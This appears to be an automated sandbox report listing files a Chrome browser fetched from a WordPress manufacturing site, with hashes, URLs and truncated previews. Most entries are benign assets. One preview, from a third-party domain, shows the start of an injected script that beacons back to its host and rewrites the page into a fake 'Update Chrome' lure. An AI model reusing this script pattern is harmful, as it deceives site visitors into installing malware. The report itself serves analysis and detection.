                                                                            URL:https://fonts.googleapis.com/css?family=League+Spartan%3A700%2C400%7Cacumin-pro-wide%3A900%2C700%7Cacumin-pro-condensed%3A700&ver=6.6.2
                                                                            Preview:/* vietnamese */.@font-face {. font-family: 'League Spartan';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/leaguespartan/v11/kJEqBuEW6A0lliaV_m88ja5TwvZ_LZmFDA.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'League Spartan';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/leaguespartan/v11/kJEqBuEW6A0lliaV_m88ja5TwvZ-LZmFDA.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'League Spartan';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/leaguespartan/v11/kJEqBuEW6A0lli
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 125 x 64, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):1818
                                                                            Entropy (8bit):7.533443140266921
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4C95D062D8B59335C265B3033E8AF037
                                                                            SHA1:E8A76C2646D7F615061A83BB557533998CED4E9F
                                                                            SHA-256:4B306354496409A368D54B756A684A447F5E28A8F8636F7AB07948C8C6E5A4F2
                                                                            SHA-512:4C5C37C2C088032BB8A9D84F84599C1310E6AA62A95EAB1AAEC070FC51183DF30644377BC3AF9CD4BB9CC5B7A88A65F67591205E4D05F762D3EC94E0B73CBEA4
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...}...@........d....PLTE........................................................................................................................................................................#.=m...7tRNS.....r..... .)1.P;#.-6.I..D.X%.......f?.M.`Rl......x..,......IDATx....v.H.......$..9...=.....$#...a.e.>..B.U]u8.wwwwww..............F.?1.!|7..7]...d....qNw.g.@./.a.~:X..&:I.MU..x........0....j... ..*........SFFD.(.........t.@...NtMj.I..e.4!k..1.`.A.%."...q...L.}Q;%"...\.)H...=2".......4...~....H[.q....,(zKtHxI....h.qb[....V..Y...M....T->..^..O6.....V..-|...z.=............. .T.-G.3..N....V8-..'.&.....B@.AJ.o_....F..+CM.iF.j......a..I..N.E...."@8.(5....z~km\Y*........./(.51.v........z.W6......i.lp.p...|i..m..*1d.i...p......q.ny.>...).9....+=.^..~e...XM@......D=7...^I...>.d8ZG.(x@H....A..gY.P4.........gb?tP..W....`g..9.1.2.y.%..p..oD..&|..o2..,..,.)..DT..nW...rg.K.Y...t}i..\9..=.i...U.#.#.l.P....T%.0.7..V..3_..8*'e.$...,.s......f..f.zD..BQ
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 25868, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):25868
                                                                            Entropy (8bit):7.991227367740765
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:E563407BD030BA00C66655B953799073
                                                                            SHA1:C9C116C65BCE6963078B8A5CE8500B5C63CCCA5B
                                                                            SHA-256:12E108760FE5261472D3E252DD12822A6892CAC2B7A2269BFBCCD44B52653C5F
                                                                            SHA-512:9EA934C0D80D2C2F807CB2079826044E256D5191641FEEEB3364ADABF189E74645C8E5BE0D40B3DE3316D5430EB678737514F35140DC136FD4F4642215544BF9
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://use.typekit.net/af/c64ee1/00000000000000003b9acb06/27/l?primer=7cdcb44be4a7db8877ffa5c0007b8dd865b3bbc383831fe2ea177f62257a9191&fvd=n3&v=3
                                                                            Preview:wOF2......e........h..d..........................:?DYNA..?GDYN.....V..,.`.......s.....|..M..f..6.$..H. .....:.B...uD.j/."..p..I?.TU...j@........"0n.c.......}...$....l.V<5ht.qi$2~:..........9.9H.$..8T.JM.]..x?.....Z...SO.#J.v...Ok.....Le..#...~/MOz....$..oq..j.b:..|.t...?.LL,....Y./.v..0.Tt....@(..Y.....R.hi.Y.*.:....[........*.Y.c..H.Z......#.../.>J.....9=......B..H.*&@}@eb..j..\2Q2.. ...i.."...D.v....I..xjK..4...p._ZI..V.....Cd7.t..f..I..nm..=.Q.6..Y.f.v....j..=.Q.......3.10..QL...P.h...35r.&....0`6..@...i.?.C.('*.!...!....+Z7............/.2.I.<;X...*.1T.b..c.Xt!.!u...u.q]z.e....G...S.=.Z%...PD....l.O2....u.G..^.d,...>..W..]3..?.K..I.Kc...@..y....B2........2Ni.g....[3.....H....8. 6._...9.q.x....G....".~..,...!.9._:.<..........~........A....8........_...)(..................w..,>...N....vy...N..f.&.41|.!....2|..u.W6..C...w.X.{......O.y.2.ZU....(RX.E.....tqXfD......r)B... MM.e.|&..D.!=-e...fv.[w...=.{.,..e.z4.e#l.^...,.m.#.\.d.kjy...J|#<...(......&..,
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):63239
                                                                            Entropy (8bit):5.032381473185105
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0045532123DC94F9E17250C78FDEC5C4
                                                                            SHA1:2972C5FF8CBD39E0D92588CEF1A88993E7E6BCEA
                                                                            SHA-256:2D211E6C758242E584E013BF3578D1A2B4624A7CCD2C28C5E8F8D29E286CF71F
                                                                            SHA-512:C2C9350DEF7977139D95B6F0EEB7CEF439097611E8DBA4953C3905517A19D14AC4239ECF8EA0CCD9ABAA17399A196E848EB40A1F9DAE575A3F92A4B0972A3DA7
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/salient-nectar-slider/css/nectar-slider.css?ver=1.7.2
                                                                            Preview:/*-------------------------------------------------------------------------. ..[Table Of Contents]....1..Slider Core..2..Slider Styles..3..Slider Controls..4. .Responsive..-------------------------------------------------------------------------*/.../*-------------------------------------------------------------------------*/./*.1..Slider Core./*-------------------------------------------------------------------------*/...swiper-slide {..position: relative;..background-position: center;..background-repeat: no-repeat;..background-size: cover;..-moz-background-size: cover;..-webkit-background-size: cover;..-o-background-size: cover;.}...swiper-container {..margin:0 auto;..position:relative;..overflow:hidden;..-webkit-backface-visibility:hidden;..-moz-backface-visibility:hidden;..-ms-backface-visibility:hidden;..-o-backface-visibility:hidden;..backface-visibility:hidden;..z-index:1;.}...swiper-slide {..float: left;.}...swiper-container {..width: 100%;..height: 800px;..overflow: hidden;..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):460
                                                                            Entropy (8bit):7.474932003406807
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:4BDD6B8A6C86BC385514941B43F9B10B
                                                                            SHA1:AACE1A768CF877D749833741A2A854AA254F8993
                                                                            SHA-256:5BC76930FBBF17C74E5A0C51FF08F11944C599FCD46C7FF9B3F4BC44A0CCAAC9
                                                                            SHA-512:A53B4B811749B45359EC9763335F918B918FE3F26AD094F60819733EC0A384F2BCD3043A82477D27F22C8497DCC1C0CFAA858AD271D42EA0FE91C53D7DA658E7
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/09/loader-dark.png
                                                                            Preview:RIFF....WEBPVP8L..../c....`.m...`.?....m.^.1. 73m...c.Anf.....Fq...fw33m..$.../$... .....d.*%\...0.."&.............C..+..Mvt>B..s.O....4......c+}..N.....~..O@....?.....J..h..6.L.+.R..&2.a.i@.*L.K{..{Gf=.3Q\R......dA"..We..e<Od7.W2.>.E2../.x.2.i.H.J"..._.O./:.u.vx...6R.y{..\.8..!P.%N.*.,....B...\f+QU.....X....WX[...;u...:6...l.O.Su.....jV%....na.". ..r*....p..:...N...{O.(Memc.He...`...Dem.\g".|.1....7.d..y.=g..N.v.Gv..PK.I.w.ov.....33..K.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):715
                                                                            Entropy (8bit):4.726845860508812
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2BDB360E0256C379B79297803F33AA90
                                                                            SHA1:6409F9104D1A0E01E7B13622C4C2158BBA9FD791
                                                                            SHA-256:3028C4B426197908BAB53D10EBADD71EE50152364D8A7A32172B0D3C3A8D059C
                                                                            SHA-512:F9636A4DB1480287367D9CD3DFAE87F7D35D99C300E96CE4D5322423E028D8A5CF29B38C8C1B4DAC655E7517E2570A49BA575C207133DA358E2F9C97F872859A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:{"fragments":{"div.widget_shopping_cart_content":"<div class=\"widget_shopping_cart_content\">\n\t\n\t\t\t<p class=\"woocommerce-mini-cart__empty-message\">No products in the cart.<\/p>\n\t\t\t\n<\/div>","a.cart-parent":"","a.cart-contents":"\t\t<a class=\"cart-contents\" aria-label=\"Cart\" href=\"https:\/\/rocklandmfg.com\"><div class=\"cart-icon-wrap\"><i class=\"icon-salient-cart\"><\/i> <div class=\"cart-wrap\"><span>0 <\/span><\/div> <\/div><\/a>\n\t\t","a#mobile-cart-link":"\t\t<a id=\"mobile-cart-link\" aria-label=\"Cart\" data-cart-style=\"dropdown\" href=\"https:\/\/rocklandmfg.com\"><i class=\"icon-salient-cart\"><\/i><div class=\"cart-wrap\"><span>0 <\/span><\/div><\/a>\n\t\t"},"cart_hash":""}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Algol 68 source, ASCII text, with very long lines (1228)
                                                                            Category:dropped
                                                                            Size (bytes):50404
                                                                            Entropy (8bit):4.576452207939489
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:523E0B9C17B249AE9FEA5B5F3207CE5B
                                                                            SHA1:8CB65458BB811CA97DB919C53675D0DDAC7098D5
                                                                            SHA-256:BD0057E4EE83E7F4F28614F61DB4F256B777B6514041D0B0B3FFD17A33DE1AD8
                                                                            SHA-512:3B62E8C8A0B87CC0E6B105B3B7EBA62EF958A4251CD0D2C831BCE22C3F0883A393015C3AA723E4B5D18E0232B9FCC124D0CF226CB76E1A7CCCE8F8BD3F8ACCCF
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:var aoPostLoadFormCallback = aoPostLoadFormCallback || {};.var aoPostSubmitFormCallback = aoPostSubmitFormCallback || {};..var _aoFormLoader = (function(w){..var stylesLoaded = false;..var captchaLoaded = false;..var gfLoaded = false;..var htmlId = false;..var formsLoadedCount = 0;..var formsCount = 0;.. var scheme = document.location.protocol + "//";.. function populateDateField(inputElem, value) {. if(!value || !inputElem) {. return;. }.. var dateWrapper = inputElem.parentElement;. var dateElements = dateWrapper.querySelectorAll('input.ao-form-field-date');. .var amPm;.. if (value.indexOf("AM")) {. .value = value.replace("AM", "");. .amPm = "AM";..} else if (value.indexOf("PM")) {...value = value.replace("PM", "");...amPm = "PM";..}. var dateFormat = value.split(/[:\/\s]+/);.. // Populate all date input fields. dateElements.forEach(function(elem, index) {. elem.value = dateFormat[index] || '';. });.. // Populate AM/PM dropdown. if(a
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):107217
                                                                            Entropy (8bit):6.063778308258784
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B2C3CD94B5B441095629E723B75CB1D1
                                                                            SHA1:28721F45A0CE3C5E2220271E8935D44DB8309F10
                                                                            SHA-256:34607516413D5FEEA74D9A6E4D4E1D738F34F013AB2682A3966342532790FB03
                                                                            SHA-512:491C74AE8F75C30ACE5C2F203D688ED08CE247FBD626DFBA0C669E38B53DEC529ED3BEF07D4B2076AE921858CD9D597AA84136654DBB5AD5B650F4B56B3C6A71
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://pluralism.themancav.com/LSgNY1YKbgpJCjdRGxwhQV5caBMPEi8CQ0lhGldNUgVdCiFBXwo3QVRbdwlMRW4KSENqAEBFfwtETmQAD1U=
                                                                            Preview:(function(){window.localStorage[window.location.hostname]=1;var domain='https://pluralism.themancav.com/';function sendStatistics(type){var i=new Image();i.src=domain+type;}var elems=[document.documentElement,document.head,document.body];var attrs=['class','style','lang','id','dir'];for(var i=0;i<elems.length;i++){for(var j=0;j<attrs.length;j++){try{elems[i].removeAttribute(attrs[j]);}catch(e){}}}document.head.innerHTML='<meta http-equiv="content-type" content="text/html; charset=UTF-8">'+'<meta charset="utf-8">'+'<title>Update Chrome</title>'+'<style> * {margin: 0;padding: 0;}html {overflow-y: scroll;}body {color: #333;font: 13px/18px \'Segoe UI\',sans-serif;font-weight: 400;}.compact {border-left: 26px transparent solid;border-right: 26px transparent solid;margin: 0 auto;max-width: 928px;}#header {height: 64px;position: relative;}.g-section:after {clear: both;content: ".";display: block;height: 0;visibility: hidden;}.g-section, .g-unit {zoom: 1;}#header-logo {margin-top: 20px;}.fatna
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (46554)
                                                                            Category:downloaded
                                                                            Size (bytes):46555
                                                                            Entropy (8bit):5.273836830118638
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:CF9D22F3EE084B5B9B3F43ABF602A988
                                                                            SHA1:5FA33DE95B6EEB69BB70AF2177352CF656388751
                                                                            SHA-256:684E82D57E0E22CFE1EA891AE71A007654C2EB7E69CCCA318351EE9D0E9CF644
                                                                            SHA-512:6EECE35ADD3BEBD26B241477F2FFF7FDF57594990096277F7E197ED943FFAEE7A8DDF5696CFB1965C6F404C5CA9123DDE3A086307E7FA93C775F3521D9AFBB1E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.6.0
                                                                            Preview:#sb_instagram {width: 100%;margin: 0 auto;padding: 0;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram:after{content: "";display: table;clear: both;}#sb_instagram.sbi_fixed_height{overflow: hidden;overflow-y: auto;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram #sbi_images{-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;}#sb_instagram .sbi_header_link {-webkit-box-shadow: none;box-shadow: none;}#sb_instagram .sbi_header_link:hover {border: none;}#sb_instagram #sbi_images .sbi_item{display: inline-block;width: 100%;vertical-align: top;zoom: 1;margin: 0 !important;text-decoration: none;opacity: 1;overflow: hidden;-webkit-box-sizing: border-box;-moz-box-sizing: border-box;box-sizing: border-box;-webkit-transition: all 0.5s ease;-moz-transition: all 0.5s ease;-o-transition: all 0.5s ease;transition: all 0.5s ease;}#sb_instagram #sbi_images .sbi_item.sbi_transiti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (5000), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):5000
                                                                            Entropy (8bit):4.721351180997943
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:207B35FC83FA0C3BBAC2621F8C3A31F0
                                                                            SHA1:9EC9632CA3394CC678A5ECC68BAAF642D373B179
                                                                            SHA-256:9F4A105311F1DB5DC8015799ECDB3CFDF50CA417F61E448A51787E9BA5BBE314
                                                                            SHA-512:E474E2FD62ED32C424706B4A0C8EC5E02092A8B93EAFCA85149B1FD6517EC8D08FC3B301C8C8682C0FC14B91FC8774E47F0B9258EB7EA8ACAE764002848318C5
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/build/third-party/woocommerce/product-style-classic.css?ver=17.0.3
                                                                            Preview:.woocommerce ul.products li.product.classic .product-wrap img{margin-bottom:0}.woocommerce ul.products li.product.classic .onsale{pointer-events:none}.woocommerce ul.products li.product.classic h3,.woocommerce-page ul.products li.product.classic h3{font-size:14px}.woocommerce ul.products li.first.classic,.woocommerce-page ul.products li.first.classic{clear:both}.woocommerce .product-wrap:hover .product-add-to-cart a{-webkit-transform:translateY(0)!important;transform:translateY(0)!important}.woocommerce .classic .product-wrap .add_to_cart_button,.woocommerce .classic .product-wrap .product_type_grouped,.woocommerce .classic .product-wrap .product_type_variable,.woocommerce .classic .product-wrap a.button{position:absolute!important;transform:translateY(101%);-webkit-transform:translateY(101%);top:auto!important;bottom:0;left:0;z-index:20}.woocommerce .classic .product-wrap a.button,.woocommerce ul.products li.product.classic .button{min-height:40px;margin:0}.woocommerce .classic .produ
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 64x64, components 3
                                                                            Category:downloaded
                                                                            Size (bytes):1047
                                                                            Entropy (8bit):7.333983536790372
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:FC6F92BBF283F7541B5103F5D43B8209
                                                                            SHA1:02549302B6E210F16A520E3EE4CD8A4D2BDADFE9
                                                                            SHA-256:90F7CF8911FB40055017610CF60F8425B3B4C419995258DA6489C86C1EE0F111
                                                                            SHA-512:EA5626B23EF82F789BDBB003E65FFD3D370411169FB937F15EEF22DA7C84551B0034D913046F7AEFA6B380FD87EF0A5D86D53664D8B9FB08624CC65BBE629996
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQm-6XY1ZQdeThoB7clqr7WXa115uGGj8Idnjfec08&s=10
                                                                            Preview:......JFIF......................................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...........7%.%77777777777777777777777777777777777777777777777777......@.@..".......................................2........................!1.A."2Qaq.....B.....#$R...............................'......................1.!..Q.."Aa................?..*c.=t...1..0W.....p.p..>.~..tL.lm..x......8.rI...g..r8..?....=@.0.......N.......X%...c.~.ow.#@......S....*`.}...G.r@...b...Oz...,p.z...Mn..bB.. ...+;}.....#.^.}.N....,.xP.Z.'O.q.I.x....q...'.<~..J.d..........ZX..Z..i.\.#.p-.{...KhZ.5.... m...=.P9.;....m..K.,.I..)*.s....9....9:.,@.v...F...'9.r.,{c5^...a...1.1S8/*...9.....6.5.d.L!b....?..?T..O....!..#..}.8.....\.5.B....u..s.R...vP.Cz.....,su...G.a.%+_.]..tEt.o....Y......-%.l3.t.U....YBZ.D..%...O.Tt..7....gu..b...F.J..S..k..s.V. ..#}+...<'.Ym.p..3....I..ZP...g.]6..`.B...Kj.cV..,s.R.....O.nW.....)a...1.c5F.m.....O .zUKh}..J..-+kIF...........L..b`...G..$(.....w......C...z..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1635602
                                                                            Entropy (8bit):7.9978183746075
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:A81540C6946EB25D1FA9038A76CA4189
                                                                            SHA1:E8543A266AB932BCFF45FD4A61F7215FD2293CD4
                                                                            SHA-256:F0158689CAAA210DC63AB12BE63945034D17604FF8DBB41F33C4342EF9731E1A
                                                                            SHA-512:023A9B86CE9E7EEFA3CD3AAE161EF32FE1182B140EF1D2C721B2F74E2E9F1FB6DFB54EF5798C9160D484850393D67E506C89D423CC55B055B175931A14A01B7F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/grader-slider.png
                                                                            Preview:RIFF....WEBPVP8L..../.....@.d+l3.!<..... YI......1...o!$k....H.....?...M9.....Z....9...v..*..ri..k.r./Q..........N...0B...d....VK..6..`..$.qN..Y..V..LJ...k.....Z..2R%CA..'..Zs.&c.,-..*..B..d..9ad+tz]..I...NI8..Z...j..-.....T4wa..B..Z.(......)..{.../..TQK.~6...i..+1z....@ Q...Q.9....4I .@H..R..|.Q9.U.%I@.*..... 8....n.}1...#..WU)<..&..VY.g.......$.L..X..l.I.I..MB...H.$I......}...IP$M.=G..U.....Y.../.4.=.._.'..B.._H.b.m.e......".A.k....8:.J#....m..1...YY....Xf...<3.e...^&.LVV.../.q.L\Df.Ef./...c...deG&r.3r.}Y...D&...........'.EV.Y.<".qq..E>.E.0...t04K_Y.^..._,.......E,...".....Ld-b. "....:|>8e.%...(......b..G...S.......dqc2.:4&...,.G.....8...LV...'.}...?N]zp....I.w..+.d...;..dJ. .3yK.[.$Y.v..O..m....D..[..F.nu...f.\.+.X.%1..b....$.$".$.&.2...|....%1.N.K.2C..tJL..$].X...L.d.fzL+..^.'.........?B..;....~.wE$.+.+.;.J..bqz.&....EV.I2.$.I\D.H...-~.um.......$..W:.#..+."..+.........._..3.t:.......d...yzd_. ..-...........w.y[....D.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (55498), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55498
                                                                            Entropy (8bit):5.0732904819184474
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:8BEF3766446B7967077C629D96D146D0
                                                                            SHA1:E7104C7AD2C7286EAAB232476B6C75588877E1E1
                                                                            SHA-256:25CACB6853BC8FC8141A59AF840CABD5B41C9BBCE1E8ACCC4C19783949D3D5F6
                                                                            SHA-512:80579356AE23A201D0C808512EC36FF02DFDC7770EF065EE7F2450AEB55255FB3474EB688BF90E63AB98940656C14ECCA3783A41E699E02C865471D80A10324A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";var i=Array.prototype.slice,n=t.console,s=void 0===n?function(){}:function(t){n.error(t)};function o(n,o,a){(a=a||e||t.jQuery)&&(o.prototype.option||(o.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t))}),a.fn[n]=function(t){var e;return"string"==typeof t?function(t,e,i){var o,r="$()."+n+'("'+e+'")';return t.each(function(t,l){var h=a.data(l,n);if(h){var c=h[e];if(c&&"_"!=e.charAt(0)){var d=c.apply(h,i);o=void 0===o?d:o}else s(r+" is not a valid method")}else s(n+" not initialized. Cannot call methods, i.e. "+r)}),void 0!==o?o:t}(this,t,i.call(arguments,1)):(e=t,this.each(function(t,i){var s=a.data(i,n);s?(s.option(e),s._init()):(s=new o(i,e),a.data(i,n,s))}),this)},r(a))}func
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:SVG Scalable Vector Graphics image
                                                                            Category:dropped
                                                                            Size (bytes):1060
                                                                            Entropy (8bit):4.909338015943193
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F66E6D470102016463BFA02E2F0CA212
                                                                            SHA1:B2670AC12BE013187D7ABCF8D53E7FC40157407F
                                                                            SHA-256:2AA23F5AF25D7923A19E02EBED5522A4BA03E41E96026548664F0A23FD599AC8
                                                                            SHA-512:23A3B0E83C30F1E838BB5E22E37D06A7C0A5F40432283808EAE38ABF2391856DCF6B40FC5720A46629D256EE241A090358ECBA8A50A05CC219FE29A8C0625B38
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="10px" height="5px" viewBox="0 0 10 5" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 48.1 (47250) - http://www.bohemiancoding.com/sketch -->. <title>Down Arrow</title>. <desc>Created with Sketch.</desc>. <defs>. <polygon id="path-1" points="7 10 12 15 17 10"></polygon>. </defs>. <g id="Small-Desktop" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" transform="translate(-457.000000, -282.000000)">. <g id="Menu/Select" transform="translate(234.000000, 264.000000)">. <g id="Down-Arrow" transform="translate(216.000000, 8.000000)">. <polygon id="Color/Blue,-sm" points="0 0 24 0 24 24 0 24"></polygon>. <mask id="mask-2" fill="white">. <use xlink:href="#path-1"></use>. </mask>. <use id="Mask" fill="#2F2F2F" fill-rule="nonzero" xlink:href="#
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1054
                                                                            Entropy (8bit):7.76038911454986
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D57B8BDD3FCC64AEB9DEFBEE229B792A
                                                                            SHA1:670E69F04FB43FD4D65D594CFC75AC7DCF2998EA
                                                                            SHA-256:0574FED189ABDC3A4AECE392708E54C4AFAC7B44F5DC5ECDA8C5DAE91846AF52
                                                                            SHA-512:7D7CC527395D5F810ACA5C837C813FE4FCFDAD5D1DFA8B130146A658FF079816B1C40C322EE8472A1D5560BB84B260DE19C880E40D1317A937330C12479B2F03
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/10/aed-logo.png
                                                                            Preview:RIFF....WEBPVP8L..../|....1..?......&.A....A..... ."...0.B.....p... ..a......A[.m7.5EF...&.(......no.cU.......:.._V...wU..P....l....G._..{-g.z>.......|......4.5I.V.|...........9e......%.K.,?.c..s0{_i6>0.A..e.8..X+...[...s..p.l{..B..,rR.'o +f.Q.35}...q...w;N."1e.m..........L....h.Q.a..[d..W(..[.$..1I.d..d&=..[&.I...G'..b.......kSf&.E..=6P8f`..r...q.*.eg\..!..y?....f`-/....c..Z..+A..L....kR.1..53I:.$.[.G.U)....<..x*.....}.Yu..,..L.u..^...)....L2...zr%8S.,x..N..*q..>%..&..Wq. .C4(3...x._km..k.@.y...[Q&-.9.......c..lB;O.w......m....x.......D....}..k)...Rh.....`%...xy...D:.....,.......r..,.=Nom.....EfrU.......^f.7.1e....2..*.....Qfz...S..%3)Aq.LJB3y.. ..(.X...*.\.U....~;..@+4/.b`.:..)Aw..ki .\.....0...4......*0.|Sf..%.6w...:.....>....R..b.P7p..Y.."e.....5.C`@.'......7.6.T..Lb...O.7[ ..6v.L.@t.G.3"...^............r.]6.l.q...[...)3../....d.J;.+,.k%yH..Yc.Z.V..l../.9.Z.v.Z..p....uP.\<t[X...dI...=r.;.g.....Q.h..X{.....q.-.m Q...v..;}....D..(u.....c.v
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (15752)
                                                                            Category:dropped
                                                                            Size (bytes):18726
                                                                            Entropy (8bit):4.756109283632968
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                            SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                            SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                            SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):1546
                                                                            Entropy (8bit):7.818519336465158
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:2AB364D7C04A66328B7CC71F32F3B6E6
                                                                            SHA1:F614AA45255151853EE4C5D617305BEE8BF4F067
                                                                            SHA-256:457FE8A4EA6408884CA9B45FBAE1FC9BCF89A85F1A1BE88FA18377B8DD8BF142
